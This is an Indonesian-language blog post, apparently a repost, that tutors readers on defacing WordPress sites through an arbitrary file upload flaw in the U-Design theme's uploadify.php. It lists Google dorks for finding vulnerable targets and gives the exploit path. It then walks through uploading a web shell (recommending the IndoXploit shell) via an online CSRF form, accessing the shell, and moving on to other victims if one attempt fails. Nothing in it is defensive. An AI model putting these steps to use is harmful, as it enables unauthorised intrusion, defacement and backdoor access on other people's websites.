Deface Website WordPress Theme U-Design Arbitrary File Upload Vulnerabilty

Deface Website WordPress Theme U-Design Arbitrary File Upload Vulnerabilty

Hasil gambar untuk wordpress hacked


===================================================================
== Dork : inurl:/wp-content/themes/u-design/                                                            ==
==            inurl:/wp-content/themes/u-design/options/                                               ==
==            inurl:/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php ==
== Exploit : /wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php      ==             
== CSRF : Disini  (Online) By Drach Levia                                                               ==
== Shell : Carik Sendiri Di Google :v (Recomended IndoXploit shell)                      ==
===================================================================

Proof Of Concept :

1. Dorking makek Dork Diatas !!! Pelajari dan Kembangin lagi -_- !!!

2. Jika udah ketemu webnya Masukkan Exploitnya. Contoh : www.bechy.com/[path]/wp-content/themes/u-design/scripts/admin/uploadify/uploadify.php

3. Nah. Disini tahap yang menentukan keberhasilannya :v. Kalok dia Blank maka Vuln(Anda beruntung) tapi kalok ga Blank atau Not Found / Error 404. Carik target lain, jangan menyerah :v tetap semangat

4. Masukan url target kalian ke CSRF online tadi, Pilih Post Name nya pilih Filedata, klik next lalu Upload Shellnya deh dengan Submit.


5. Jika vuln/berhasil hasil tampilannya ada Angka "1" (Tanpa Tanda Kutip). Kalok ga berhasil Cari yang lain :V Tetap Semangat. Jangan menyerah.


 6. Lalu Cara akses Shell yang kita Upload www.bechy.com/shellku.php



7. Done. Silahkan Di Obok-obok.


Thanks to :sasrgrup
Repost : Mr.Bechy

Comments